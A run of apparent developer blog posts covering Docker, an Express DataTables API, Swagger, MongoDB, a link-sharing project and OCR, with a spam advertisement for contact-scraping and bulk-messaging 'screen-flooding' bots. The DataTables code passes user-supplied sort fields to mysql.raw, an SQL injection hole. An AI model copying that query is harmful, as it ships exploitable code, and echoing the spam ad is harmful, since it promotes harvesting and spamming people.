        <p><a class="btn btn-primary btn-lg" href="/sharks" role="button">Get Shark Info Now</a>
        </p>
    </div>
</div>
<div class="container">
    <div class="row">
        <div class="col-lg-6">
            <h3>Not all sharks are alike</h3>
            <p>Though some are dangerous, sharks generally do not attack humans. Out of the 500 species known to researchers, only 30 have been known to attack humans.
            </p>
        </div>
        <div class="col-lg-6">
            <h3>Sharks are ancient</h3>
            <p>There is evidence to suggest that sharks lived up to 400 million years ago.
            </p>
        </div>
    </div>
</div>
</body>
</html>
```

**sharks.html**

```
<!DOCTYPE html>
<html lang="en">
<head>
    <title>About Sharks</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
    <link href="css/styles.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Merriweather:400,700" rel="stylesheet" type="text/css">
</head>
<nav class="navbar navbar-dark bg-dark navbar-static-top navbar-expand-md">
    <div class="container">
        <button type="button" class="navbar-toggler collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
            <span class="sr-only">Toggle navigation</span>
        </button>
        <a class="navbar-brand" href="/">Everything Sharks</a>
        <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
            <ul class="nav navbar-nav mr-auto">
                <li class="nav-item"><a href="/" class="nav-link">Home</a>
                </li>
                <li class="active nav-item"><a href="/sharks" class="nav-link">Sharks</a>
                </li>
            </ul>
        </div>
    </div>
</nav>
<div class="jumbotron text-center">
    <h1>Shark Info</h1>
</div>
<div class="container">
    <div class="row">
        <div class="col-lg-6">
            <p>
            <div class="caption">Some sharks are known to be dangerous to humans, though many more are not. The sawshark, for example, is not considered a threat to humans.
            </div>
            <img src="https://assets.digitalocean.com/articles/docker_node_image/sawshark.jpg" alt="Sawshark">
            </p>
        </div>
        <div class="col-lg-6">
            <p>
            <div class="caption">Other sharks are known to be friendly and welcoming!</div>
            <img src="https://assets.digitalocean.com/articles/docker_node_image/sammy.png" alt="Sammy the Shark">
            </p>
        </div>
    </div>
</div>
</html>
```

Finally **views/css/style.css**

```
.navbar {
  margin-bottom: 0;
}

body {
  background: #020A1B;
  color: #ffffff;
  font-family: 'Merriweather', sans-serif;
}

h1, h2 {
  font-weight: bold;
}

p {
  font-size: 16px;
  color: #ffffff;
}

.jumbotron {
  background: #0048CD;
  color: white;
  text-align: center;
}

.jumbotron p {
  color: white;
  font-size: 26px;
}

.btn-primary {
  color: #fff;
  text-color: #000000;
  border-color: white;
  margin-bottom: 5px;
}

img, video, audio {
  margin-top: 20px;
  max-width: 80%;
}

div.caption {
  float: left;
  clear: both;
}
```

Now run this command: `node app.js`

This command will start the server and your node app 🙂 Then visit this URL: `http://localhost:8080/` and you will see your app running.

I am not describing the page code here. If you are here to learn Node + Docker, I believe you already know HTML, CSS, and Bootstrap 😎😎😎

## Step 3: DockerFile create

Create a `Dockerfile` on root and paste this code

```
FROM node:16-alpine
WORKDIR /app
COPY . .
RUN npm install
EXPOSE 8080
CMD [ "node", "app.js" ]
```

Here we simply say: take Node version 16 (the alpine lite variant); when the container is created, our app code will live inside the /app folder; copy everything in; install all dependencies; and finally expose port 8080 (the port app.js listens on) and run the app with the node command 😎

Create `.dockerignore` on root

```
node_modules
npm-debug.log
Dockerfile
.dockerignore
```

This is just because we don't want the node_modules folder and other unnecessary files inside the image. 😎
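One common refinement, not part of the original setup, is to copy `package.json` before the rest of the source so Docker caches the dependency layer; `npm install` then re-runs only when `package.json` changes, not on every code edit:

```dockerfile
FROM node:16-alpine
WORKDIR /app
# Copy only the manifest first so the npm install layer is cached between builds
COPY package.json ./
RUN npm install
# Now copy the rest of the source; editing app code won't bust the install layer
COPY . .
EXPOSE 8080
CMD [ "node", "app.js" ]
```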
## Step 4: Build And Run

Open the Docker app first, then run

`docker build -t your_dockerhub_username/nodejs-image-demo .`

I am running `docker build -t nisharga/nodeapp .` here. In this command, `-t` means the tag name; we leave the tag blank so it defaults to `latest`, but you can set one if you want 🙂

Let's check whether the image was created with this command: `docker images`

REPOSITORY TAG IMAGE ID CREATED SIZE

A bit more about these columns: REPOSITORY is the image name, TAG is the version, IMAGE ID uniquely identifies the image, CREATED is when it was built, and SIZE is the image size.

NOW IT'S TIME TO BUILD AND RUN 😀

`docker build -t nkapp . && docker run -p 1200:8080 nkapp`

Just run this command. `-t` means the tag name, and `-p` maps ports. `-p 1200:8080` means our app runs on port 8080 inside the container, and we publish it on host port 1200.

`http://localhost:1200/`

Visit this URL and you will see the live app served from the Docker image. (For a one-command alternative, see the compose sketch at the end of this post.)

## Step 5: Push the image to Docker Hub

First register on Docker Hub, then run this command:

`docker login -u DOCKER_NAME`

Then enter your password to log in 🙂

Now push the Docker image to Docker Hub:

`docker build -t nisharga/nkapp2:latest .`
`docker push nisharga/nkapp2:latest`

I am building again here to avoid confusion. I believe you are already familiar with GitHub, so you already know the githubUserName/RepoName/branchName pattern; it's 100% the same idea here. The branch name corresponds to the tag name, the repo to the app name, and the username to your Docker Hub user. Now visit Docker Hub to see your image there.

Now you can share the dockerized image with anyone; no matter what device they are using, they can easily run it with the Docker app 😎😎😎😎😎😎

**Github Source Code:** https://github.com/nisharga/node-docker
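Bonus, beyond the original post: a hypothetical `docker-compose.yml` would let you build and start this app with a single command (the service name `web` is my own choice):

```yaml
# docker-compose.yml - assumes the Dockerfile from Step 3 sits in the same folder
services:
  web:
    build: .            # build the image from the local Dockerfile
    ports:
      - "1200:8080"     # same host:container mapping as the docker run example
```

Run `docker compose up` in the project root and visit http://localhost:1200/ as before.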
nisharga_kabir
1,920,615
Create an API for DataTables with Express
DataTables is a popular jQuery plugin that offers features like pagination, searching, and sorting,...
0
2024-07-15T02:36:26
https://blog.stackpuz.com/create-an-api-for-datatables-with-express/
express, datatables
---
title: Create an API for DataTables with Express
published: true
date: 2024-07-12 08:25:00 UTC
tags: Express,DataTables
canonical_url: https://blog.stackpuz.com/create-an-api-for-datatables-with-express/
---

![Express API for DataTables](https://blog.stackpuz.com/media/posts/9/cover.jpg)

DataTables is a popular jQuery plugin that offers features like pagination, searching, and sorting, making it easy to handle large datasets. This article will demonstrate how to create an Express API that works with DataTables. We will cover the parameters that DataTables sends to our API and the data format that DataTables expects in return.

To work with DataTables, you need to understand the information that DataTables will send to the API through the query string.

```
draw = 1
columns[0][data] = id
columns[0][name] =
columns[0][searchable] = true
columns[0][orderable] = true
columns[0][search][value] =
columns[0][search][regex] = false
columns[1][data] = name
columns[1][name] =
columns[1][searchable] = true
columns[1][orderable] = true
columns[1][search][value] =
columns[1][search][regex] = false
columns[2][data] = price
columns[2][name] =
columns[2][searchable] = true
columns[2][orderable] = true
columns[2][search][value] =
columns[2][search][regex] = false
order[0][column] = 0
order[0][dir] = asc
order[0][name] =
start = 0
length = 10
search[value] =
search[regex] = false
```

- `draw` the request ID that is used to synchronize between the client and server.
- `columns[x][data]` the column's field name that we define on the client-side.
- `order[0]` the sorting information.
- `start` the start index of the record, which we will use as the SQL `offset`.
- `length` the length per page (page size), which we will use as the SQL `limit`.
- `search[value]` the search value information.

The response that DataTables expects must include the following information (a sample response payload is shown at the end of this article).

- `draw` DataTables sends this ID to us, and we just send it back.
- `recordsTotal` Total number of records before filtering.
- `recordsFiltered` Total number of records after filtering.
- `data` The records data.

## Prerequisites

- Node.js
- MySQL

## Setup project

Setting up the Node.js project dependencies.

```
npm install express mysql2
```

Create a testing database named "example" and run the [database.sql](https://github.com/StackPuz/Example-Datatables-Express/blob/main/database.sql) file to import the table and data.

## Project structure

```
├─ config.js
├─ index.js
└─ public
   └─ index.html
```

## Project files

### config.js

This file contains the database connection information.

```javascript
module.exports = {
  host: 'localhost',
  database: 'example',
  user: 'root',
  password: ''
}
```

### index.js

This file is the main entry point for the Express application. It will create and set up the Express server. Because this API only has one routing URL, we will include it and the handler function in this file.
```javascript
const express = require('express')
const mysql = require('mysql2') // mysql2 matches the dependency installed earlier
const util = require('util')
const config = require('./config')

let con = mysql.createConnection({
  host: config.host,
  database: config.database,
  user: config.user,
  password: config.password
})
let query = util.promisify(con.query).bind(con)
let app = express()
app.use(express.static('public'))

app.get('/api/products', async (req, res) => {
  let size = parseInt(req.query.length) || 10
  let start = parseInt(req.query.start)
  let order = mysql.raw((req.query.order && req.query.columns[req.query.order[0].column].data) || 'id')
  let direction = mysql.raw((req.query.order && req.query.order[0].dir) || 'asc')
  let params = [order, direction, size, start]
  let search = req.query.search.value
  let sql = 'select * from product'
  if (search) {
    search = `%${search}%`
    sql = 'select * from product where name like ?'
    params.unshift(search)
  }
  let recordsTotal = (await query('select count(*) as count from product'))[0].count
  let recordsFiltered = (await query(sql.replace('*', 'count(*) as count'), search))[0].count
  let data = (await query(`${sql} order by ? ? limit ? offset ?`, params))
  res.send({
    draw: req.query.draw,
    recordsTotal,
    recordsFiltered,
    data
  })
})

app.listen(8000)
```

- `mysql.createConnection()` will create the database connection.
- `express.static('public')` will serve the static resources inside the public folder. (We use it to serve index.html as the default page.)
- We utilize the query string to get the `size, start, order, direction` information and create the paginated data by using the `limit` and `offset` of the SQL query.
- We return all the information DataTables requires, including `draw, recordsTotal, recordsFiltered, data`, as an object.

### index.html

This file will be used to set up the DataTables HTML and JavaScript to work with our API.

```html
<!DOCTYPE html>
<head>
    <link rel="stylesheet" href="https://cdn.datatables.net/2.0.7/css/dataTables.dataTables.min.css">
</head>
<body>
    <table id="table" class="display">
        <thead>
            <tr>
                <th>id</th>
                <th>name</th>
                <th>price</th>
            </tr>
        </thead>
    </table>
    <script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
    <script src="https://cdn.datatables.net/2.0.7/js/dataTables.min.js"></script>
    <script>
        new DataTable('#table', {
            ajax: '/api/products',
            processing: true,
            serverSide: true,
            columns: [
                { data: 'id' },
                { data: 'name' },
                { data: 'price' }
            ]
        })
    </script>
</body>
</html>
```

- `processing: true` shows a loading indicator while a request is being processed.
- `serverSide: true` sends a request to the server (API) for every operation (paging, sorting, searching).

## Run project

```
node index.js
```

Open the web browser and go to http://localhost:8000 You will find this test page.

![test page](https://blog.stackpuz.com/media/posts/9/default.png)

## Testing

### Page size test

Change the page size by selecting 25 from the "entries per page" drop-down. You will get 25 records per page, and the last page will change from 10 to 4.

![page size test](https://blog.stackpuz.com/media/posts/9/page-size.png)

### Sorting test

Click on the header of the first column. You will see that the id column is sorted in descending order.

![sorting test](https://blog.stackpuz.com/media/posts/9/sort.png)

### Search test

Enter "no" in the search text-box, and you will see the filtered result data.

![search test](https://blog.stackpuz.com/media/posts/9/search.png)

## Conclusion

In this article, you have learned how to create an Express API to work with DataTables.
You now understand all the DataTables parameters sent to the API and how to use them to produce the appropriate data and send it back. You have also learned how to set up DataTables on the client side using HTML and JavaScript. I hope this article helps you incorporate these techniques into your next project.

Source code: [https://github.com/stackpuz/Example-DataTables-Express](https://github.com/stackpuz/Example-DataTables-Express)

Create a CRUD Web App in Minutes: [https://stackpuz.com](https://stackpuz.com)
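As referenced earlier, here is a hypothetical example of the JSON payload our `/api/products` endpoint returns for a filtered request (the record values are made up for illustration):

```json
{
  "draw": "2",
  "recordsTotal": 100,
  "recordsFiltered": 2,
  "data": [
    { "id": 7, "name": "Notebook", "price": 2.5 },
    { "id": 12, "name": "Notepad", "price": 1.9 }
  ]
}
```

DataTables echoes the `draw` value from its own request, uses `recordsTotal` and `recordsFiltered` to render the paging summary, and maps each object in `data` onto the columns configured on the client side.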
stackpuz
1,920,788
Creating API Documentation with Swagger on NodeJS
Introduction Swagger is a popular, simple, and user-friendly tool for creating APIs. Most...
27,954
2024-07-13T03:00:00
https://howtodevez.blogspot.com/2024/04/creating-api-documentation-with-swagger-on-nodejs.html
node, typescript, beginners, backend
Introduction
------------

**Swagger** is a popular, simple, and user-friendly tool for creating **APIs**. Most backend developers, regardless of the programming languages they use, are familiar with **Swagger**. This article will guide you through creating API documentation using **Swagger** on **Node.js** (specifically integrated with the **Express** framework). This is handy when you want to provide API documentation in a professional UI format for stakeholders involved in integration.

![NodeJS Swagger](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fs4pe4us61xrf3qncgig.png)

Restful API
-----------

**REST** stands for **Representational State Transfer**. It is an architectural style that defines a set of constraints for creating web services. **RESTful APIs** provide a simple and flexible way to access web services without complex processing.

Common HTTP Methods in **RESTful APIs**:

- **GET**: Used to read (retrieve) a representation of a resource. It returns data in XML or JSON format.
- **POST**: Creates new resources or subordinates to existing ones.
- **PUT**: Updates existing resources or creates new ones if the client chooses the resource ID.
- **PATCH**: Partially modifies resources, describing changes rather than sending the entire resource.
- **DELETE**: Removes a resource.

Building API and API Documentation with Swagger
-----------------------------------------------

In this example, we'll use **Node.js, Express, and Swagger**. First, let's set up a **Node.js** project and install the necessary packages:

```sh
yarn add express swagger-jsdoc swagger-ui-express
yarn add -D @types/swagger-jsdoc @types/swagger-ui-express
```

Create a file named **_swagger.ts_** with Swagger document configuration as follows:

```ts
import * as swaggerJsdoc from 'swagger-jsdoc'
import * as swaggerUi from 'swagger-ui-express'

const options = {
  definition: {
    openapi: '3.0.0',
    info: {
      title: 'Employee API',
      description: 'Example of CRUD API ',
      version: '1.0.0',
    },
  },
  apis: ['./router/*.ts'], // path to routers
}

const swaggerSpec = swaggerJsdoc(options)

export function swaggerDocs(app, port) {
  app.use('/docs', swaggerUi.serve, swaggerUi.setup(swaggerSpec))
  app.get('/docs.json', (req, res) => {
    res.setHeader('Content-Type', 'application/json')
    res.send(swaggerSpec)
  })
}
```

Next up is the **_index.ts_** file for integrating **Express** and **Swagger**.

```ts
import * as express from 'express'
import router from './router'
import {swaggerDocs} from './swagger'

const app = express()
const port = 3000

app
  .use(express.json())
  .use(router)
  .listen(port, () => {
    console.log(`Listening at http://localhost:${port}`)
    swaggerDocs(app, port)
  })
```

To set up the **API** routers, I'll create a file named router.ts and define the API documentation right above the routers, identified by the keyword **_@openapi_**. The APIs will include 4 methods: **GET, POST, PUT, DELETE**.
```ts
import * as express from 'express'
import {addEmployeeHandler, deleteEmployeeHandler, editEmployeeHandler, getEmployeesHandler} from './controller'

const router = express.Router()

/**
 * @openapi
 * '/api/employees':
 *   get:
 *     tags:
 *       - Employee
 *     summary: Get all employees
 *     responses:
 *       200:
 *         description: Success
 *         content:
 *           application/json:
 *             schema:
 *               type: array
 *               items:
 *                 type: object
 *                 properties:
 *                   id:
 *                     type: number
 *                   name:
 *                     type: string
 *       400:
 *         description: Bad request
 */
router.get('/api/employees', getEmployeesHandler)

/**
 * @openapi
 * '/api/employee':
 *   post:
 *     tags:
 *       - Employee
 *     summary: Create an employee
 *     requestBody:
 *       required: true
 *       content:
 *         application/json:
 *           schema:
 *             type: object
 *             required:
 *               - id
 *               - name
 *             properties:
 *               id:
 *                 type: number
 *               name:
 *                 type: string
 *     responses:
 *       201:
 *         description: Created
 *       409:
 *         description: Conflict
 *       404:
 *         description: Not Found
 */
router.post('/api/employee', addEmployeeHandler)

/**
 * @openapi
 * '/api/employee':
 *   put:
 *     tags:
 *       - Employee
 *     summary: Modify an employee
 *     requestBody:
 *       required: true
 *       content:
 *         application/json:
 *           schema:
 *             type: object
 *             required:
 *               - id
 *               - name
 *             properties:
 *               id:
 *                 type: number
 *               name:
 *                 type: string
 *     responses:
 *       200:
 *         description: Modified
 *       400:
 *         description: Bad Request
 *       404:
 *         description: Not Found
 */
router.put('/api/employee', editEmployeeHandler)

/**
 * @openapi
 * '/api/employee/{id}':
 *   delete:
 *     tags:
 *       - Employee
 *     summary: Remove employee by id
 *     parameters:
 *       - name: id
 *         in: path
 *         description: The unique id of the employee
 *         required: true
 *     responses:
 *       200:
 *         description: Removed
 *       400:
 *         description: Bad request
 *       404:
 *         description: Not Found
 */
router.delete('/api/employee/:id', deleteEmployeeHandler)

export default router
```

I'll also provide an additional file named **_controller.ts_**, implemented in a simple way to handle API requests. Note that the status codes returned by the handlers match the responses documented above.

```ts
import {Request, Response} from 'express'

let employees = [
  {id: 1, name: 'Name 1'},
  {id: 2, name: 'Name 2'},
]

// GET /api/employees - return all employees
export function getEmployeesHandler(req: Request, res: Response) {
  res.status(200).json(employees)
}

// POST /api/employee - create an employee with a unique id
export function addEmployeeHandler(req: Request, res: Response) {
  if (employees.find(employee => employee.id === req.body.id)) {
    res.status(409).json('Employee id must be unique')
  } else {
    employees.push(req.body)
    res.status(201).json(employees)
  }
}

// DELETE /api/employee/:id - remove an employee by id
export function deleteEmployeeHandler(req: Request, res: Response) {
  const index = employees.findIndex(employee => employee.id === +req?.params?.id)
  if (index >= 0) {
    employees.splice(index, 1)
    res.status(200).json(employees)
  } else {
    res.status(404).send()
  }
}

// PUT /api/employee - replace an employee matched by id
export function editEmployeeHandler(req: Request, res: Response) {
  const index = employees.findIndex(employee => employee.id == req.body.id)
  if (index >= 0) {
    employees.splice(index, 1, req.body)
    res.status(200).json(employees)
  } else {
    res.status(404).send()
  }
}
```

After successfully starting the project, you can access the page **_[http://localhost:3000/docs](http://localhost:3000/docs)_** to view the API documentation in UI format generated by Swagger.

![RestFul API Swagger](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2wcje649g6uxojmg3ige.png)

Conclusion
----------

API documentation is one of the crucial documents that **back-end** developers provide to stakeholders to facilitate integration (such as **front-end** teams).
Due to the popularity and convenience of **Restful API** and **Swagger**, it's an indispensable tool for creating API documentation in a simple, professional, and consistent UI format. **_If you found this content helpful, please visit [the original article on my blog](https://howtodevez.blogspot.com/2024/04/creating-api-documentation-with-swagger-on-nodejs.html) to support the author and explore more interesting content._** <a href="https://howtodevez.blogspot.com/2024/03/sitemap.html" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Blogger-FF5722?style=for-the-badge&logo=blogger&logoColor=white" width="36" height="36" alt="Blogspot" /></a><a href="https://dev.to/chauhoangminhnguyen" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/dev.to-0A0A0A?style=for-the-badge&logo=dev.to&logoColor=white" width="36" height="36" alt="Dev.to" /></a><a href="https://www.facebook.com/profile.php?id=61557154776384" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white" width="36" height="36" alt="Facebook" /></a><a href="https://x.com/DavidNguyenSE" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white" width="36" height="36" alt="X" /></a>
chauhoangminhnguyen
1,920,801
Using MongoDB on Docker
Introduction MongoDB is a widely popular NoSQL database today due to its simplicity and...
28,046
2024-07-15T03:00:00
https://howtodevez.blogspot.com/2024/04/using-mongodb-on-docker.html
docker, beginners, mongodb, node
Introduction
------------

**MongoDB** is a widely popular **NoSQL** database today due to its simplicity and several advantages over relational databases. Through this guide, you'll learn how to quickly use **MongoDB** within **Docker** without going through many complex installation steps. Note that before starting, you need to have **Docker** installed on your machine.

![MongoDB Docker](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qsbb74au1sja747z529t.png)

Starting MongoDB on Docker
--------------------------

You just need to execute the following command:

```sh
docker run -e MONGO_INITDB_ROOT_USERNAME=username -e MONGO_INITDB_ROOT_PASSWORD=password --name mongo -p 27017:27017 -v /data/db:/data/db -d mongo
```

**Explanation of the command:**

- `-e MONGO_INITDB_ROOT_USERNAME=username -e MONGO_INITDB_ROOT_PASSWORD=password`: Sets environment variables for **MongoDB** initialization. You can replace "username" and "password" with your desired credentials.
- `--name mongo`: Sets the name for the container.
- `-p 27017:27017`: Exposes the **MongoDB** port for usage.
- `-v /data/db:/data/db`: Mounts a volume from the container to the host machine.
- `-d`: Starts the container in daemon mode.
- `mongo`: Specifies the image name; typically it would be **_mongo:latest_**.

After executing the command, if your machine doesn't have the **MongoDB** image, **Docker** will pull the **_mongo_** image to use. Subsequent executions will run the image directly.

### Some MongoDB Queries

After successfully running **MongoDB** on **Docker**, let's try connecting to **MongoDB** and executing some simple commands as follows:

First, connect to **MongoDB** like this:

```sh
docker exec -it mongo mongosh "mongodb://127.0.0.1:27017" --username username
```

After that, you will be prompted to enter the password to continue.

### Creating another account

Execute the following commands one by one:

```js
// switch to the admin db
use admin

// create a new user
db.createUser({
  user: 'username2',
  pwd: 'password2',
  roles: [{ role: 'readWrite', db: 'test2' }]
})

// list all users
show users
```

![User creation successful](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jb6hdgmt5zly5pn21pqe.png)

### Inserting data into a collection

Execute the following commands to insert data into a collection. If the collection does not exist, it will be created:

```js
// db.{collection name}.insertOne
db.tests.insertOne({
  name: 'Alice',
  age: 30,
});

db.tests.insertMany([
  { name: 'Bob', age: 25 },
  { name: 'Charlie', age: 35 },
]);

// list all documents
db.tests.find()
```

![Data insertion successful](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gbu36tz0wdp42xvu1pqz.png)

### Connecting to MongoDB on NodeJS

I'll provide a straightforward demo using **NodeJS** and **_mongoose_** to connect to **MongoDB** like this:

```ts
import mongoose, {Schema} from 'mongoose'

const host = 'mongodb://username:password@127.0.0.1:27017'
const conn = mongoose.createConnection(host)

const UserSchema = new Schema({
  name: String,
  age: Number,
  email: String,
})

// create if not exist, map with `users` collection
const User = conn.model('user', UserSchema)

const newUser = new User({
  name: 'name',
  age: 20,
  email: 'name@email.com',
})
await newUser.save()

const userData = await User.find()
console.log('Users', userData)
```

**_Please like and share if you found this post helpful.
Your support motivates me to create more valuable content!_** **_If you found this content helpful, please visit [the original article on my blog](https://howtodevez.blogspot.com/2024/04/using-mongodb-on-docker.html) to support the author and explore more interesting content._** <a href="https://howtodevez.blogspot.com/2024/03/sitemap.html" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Blogger-FF5722?style=for-the-badge&logo=blogger&logoColor=white" width="36" height="36" alt="Blogspot" /></a><a href="https://dev.to/chauhoangminhnguyen" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/dev.to-0A0A0A?style=for-the-badge&logo=dev.to&logoColor=white" width="36" height="36" alt="Dev.to" /></a><a href="https://www.facebook.com/profile.php?id=61557154776384" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white" width="36" height="36" alt="Facebook" /></a><a href="https://x.com/DavidNguyenSE" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white" width="36" height="36" alt="X" /></a>
chauhoangminhnguyen
1,921,773
Customer Acquisition Screen-Flooding Bot
Global customer-acquisition active-fan collection software, customer-acquisition bulk-messaging tools, and customer-acquisition screen-flooding bots. To learn about the related software, visit http://www.vst.tw...
0
2024-07-12T23:24:53
https://dev.to/qmmc_sqru_40a68d5c587d92e/huo-ke-ba-ping-ji-qi-ren-19e2
Global customer-acquisition active-fan collection software, customer-acquisition bulk-messaging tools, and customer-acquisition screen-flooding bots. To learn about the related software, visit http://www.vst.tw

Customer-acquisition fan-collection software is an important tool in today's digital marketing landscape. It gives businesses powerful capabilities to attract, capture, and manage information about potential customers. Both traditional enterprises and emerging online businesses can use this software to effectively expand their customer base and market share.

1. Definition and role of customer-acquisition fan-collection software

Customer-acquisition fan-collection software refers to a class of tools built specifically to collect potential-customer information from the internet. Working in an automated or semi-automated way, they search for and collect information related to a company's products or services, such as email addresses, social media accounts, and contact phone numbers. This software not only helps businesses build customer databases, it also supports customer segmentation and management, providing marketing and sales teams with precisely targeted audiences.

2. Main functions and features

The functions and features of customer-acquisition fan-collection software are varied, including but not limited to:

Automated data collection: the software can automatically scrape and organize customer information from the internet, reducing the cost and time of manual work.

Multi-channel information collection: it can gather information from multiple channels, including search engines, social media platforms, and online forums, to ensure the information is comprehensive and accurate.

Data cleaning and validation: it can clean and validate the collected data to ensure data quality and effectiveness, reducing the impact of invalid information.

Customer analysis and reporting: it provides customer behavior analysis and reporting features, helping businesses understand customer preferences and habits and optimize marketing strategies and sales processes.

3. Application scenarios and advantages

Customer-acquisition fan-collection software is widely used across many industries and scenarios, for example:

E-commerce and retail: by collecting customers' purchase history and preferences, businesses can precisely push personalized marketing campaigns and promotional offers.

Education and training institutions: collect prospective students' contact details and interests, and target them with course information and learning resources.

B2B markets: help businesses find potential business partners or suppliers and establish long-term cooperative relationships.

The advantage of customer-acquisition fan-collection software is that it improves a company's market response speed and precision and reduces the guesswork and waste in marketing. Through effective customer data management and analysis, businesses can better understand market demand, optimize products and services, and improve customer satisfaction and loyalty.

4. Security and compliance considerations

As data privacy and protection regulations become increasingly strict, data security and compliance must be considered when using customer-acquisition fan-collection software. Legal and compliant data collection and processing workflows are an important safeguard for businesses using this kind of software; they must follow the relevant local and international laws and regulations and protect user data from misuse or leakage.

Conclusion

As a key tool in modern marketing strategy, customer-acquisition fan-collection software provides important support for businesses to acquire and retain customers in a fiercely competitive market environment. Its versatile and intelligent features make it an indispensable part of a company's digital transformation, helping businesses achieve their strategic goals of market expansion and business growth.

To learn about the related software, visit http://www.vst.tw

Tag: customer-acquisition marketing bot, customer-acquisition marketing software, customer-acquisition traffic-driving software, customer-acquisition capture software, customer-acquisition follower-adding software, customer-acquisition group-control bot, customer-acquisition group-control software, customer-acquisition group control, customer-acquisition group-control expert, customer-acquisition group-control master bot, customer-acquisition group-control promotion software, customer-acquisition group-control traffic tool, customer-acquisition marketing master, customer-acquisition promotion expert
qmmc_sqru_40a68d5c587d92e
1,920,804
A New Open Source Platform for people to share their links of Favorite content over the internet
I have Created an open source Platform where a user can share the links of their favorite content...
0
2024-07-13T07:08:57
https://dev.to/emdadr/a-new-open-source-platform-for-people-to-share-their-links-of-favorite-content-over-the-internet-1hm2
webdev, opensource, dotnet, csharp
I have created an open-source platform where users can share links to their favorite content from across the internet (Insta reels, TikToks, YouTube vids, Facebook posts, Twitter/X posts, subreddits, anything)

![home page](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xxtjbq0ghkazj33suoh9.png)

------------------------------------------------------------------

On it you can create an account and post links to your favorite content

![sign up](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0mjwxnzjenhp1otesbdq.png)

------------------------------------------------------------------

(this is the upload page where users share their links 👇)

![Upload](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/old1bb5it09gczdzu6r4.png)

------------------------------------------------------------------

You can follow and unfollow people and see the public posts of the people you follow

![follow people](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/umzegz0wuvfi71bmqgnn.png)

------------------------------------------------------------------

You can set your posts to be public or private

![pub pri](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fti8fjh7hl6kf59k6d2v.png)

There is also an explore page where users can see all the public posts from around the world. There is much more to it, but I would like you to see it for yourself; that would be nice.

------------------------------------------------------------------

The only problem is that it is still incomplete. I have worked on all the core features, but I am struggling with the UI/frontend; as you might see, I am more fond of the backend. That's why I need some help with the frontend. If anyone is willing to work on it, I will be grateful. I am using ASP.NET Core MVC for this project and Tailwind CSS on the frontend. This is a community-owned project and always will be; when it is almost complete, we can host it and let people enjoy it.

------------------------------------------------------------------

Thank You ❤️

------------------------------------------------------------------

GitHub Repo 👇

{% embed https://github.com/Imdad-Rind/LinkStroage %}

If you make any changes, please open a PR

------------------------------------------------------------------
emdadr
1,920,805
Mastering Text Extraction from Multi-Page PDFs Using OCR API: A Step-by-Step Guide
Introduction Optical Character Recognition (OCR) technology has transformed the way we...
0
2024-07-15T10:58:50
https://dev.to/api4ai/mastering-text-extraction-from-multi-page-pdfs-using-ocr-api-a-step-by-step-guide-amm
ocr, textrecognition, pdf, ai
# Introduction

Optical Character Recognition (OCR) technology has transformed the way we manage and process documents. OCR enables computers to convert various types of documents, such as scanned paper documents, PDF files, or images taken by a digital camera, into editable and searchable data. By identifying the text within these documents, OCR facilitates the digitization and management of information.

Extracting text from multi-page PDFs is crucial in numerous industries and applications. Whether it's for archiving legal documents, processing medical records, or managing financial statements, the capability to accurately and efficiently extract text from PDFs can significantly enhance productivity and data accessibility. Multi-page PDFs often contain extensive information spread across many pages, making manual data extraction laborious and error-prone. OCR technology streamlines this process, ensuring that text is extracted quickly and with high precision.

In this tutorial, we will walk you through the comprehensive process of extracting text from multi-page PDFs using the [API4AI OCR API](https://api4.ai/apis/ocr). We will begin with an overview of OCR and its applications, followed by a comparison of popular OCR solutions. Next, we will prepare your environment by subscribing to the API, obtaining the necessary API key, and making a basic API call. Finally, we will explore handling multi-page PDFs, providing example code to iterate through pages and extract text efficiently. By the end of this tutorial, you will have a thorough understanding of how to utilize OCR technology to optimize your document processing tasks.

# Understanding OCR and Its Applications

## Definition and Brief History of OCR

Optical Character Recognition (OCR) is a technology that transforms various types of documents, such as scanned paper documents, PDF files, or images taken with a digital camera, into editable and searchable data. OCR operates by examining the shapes of characters within a document and converting them into machine-readable text. This process allows computers to interpret and process text that previously required manual transcription.

The origins of OCR date back to the early 20th century, with initial attempts to develop machines capable of reading text. However, substantial progress in OCR technology occurred during the 1970s and 1980s, thanks to the creation of more advanced algorithms and the emergence of digital imaging. The advent of personal computers further boosted the adoption of OCR, making it available to a broader audience and a variety of applications. Today, OCR technology continues to advance, incorporating artificial intelligence and machine learning to achieve greater accuracy and flexibility.

## Applications of OCR in Various Industries

OCR technology is utilized across numerous industries, each benefiting from its capacity to enhance document processing and data management:

- **Legal**: In the legal field, OCR is employed to digitize and organize large volumes of legal documents, contracts, and case files. This enables rapid information retrieval, efficient document searching, and reduced need for physical storage.

- **Healthcare**: Medical providers use OCR to transform patient records, medical forms, and prescriptions into digital formats. This improves patient care by ensuring that medical information is readily accessible and can be securely shared among healthcare professionals.
